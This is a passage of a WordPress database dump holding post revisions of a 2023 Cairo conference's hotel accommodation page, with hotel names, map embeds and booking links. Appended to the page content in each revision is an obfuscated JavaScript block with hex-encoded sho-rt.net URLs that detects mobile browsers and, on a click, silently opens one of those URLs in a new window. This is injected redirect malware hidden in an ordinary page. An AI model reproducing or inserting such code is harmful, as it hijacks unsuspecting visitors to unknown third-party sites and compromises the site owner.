_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:07:40','2023-07-18 23:07:40','',2685,'https://gsw2023.com/?p=5024',0,'revision','',0),
(5025,1,'2023-07-18 23:12:39','2023-07-18 23:12:39','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<h5 style=\"text-align: center;\"><a href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\"><span style=\"font-size: 14pt; color: #ffff00;\">BOOK NOW</span></a></h5>\n<p>[/dt_banner][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\">Novotel Cairo El Borg</h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\">BOOK NOW  </a></strong></span></h4>\n<p>&nbsp;[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:12:39','2023-07-18 23:12:39','',2685,'https://gsw2023.com/?p=5025',0,'revision','',0),
(5026,1,'2023-07-18 23:13:28','2023-07-18 23:13:28','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" 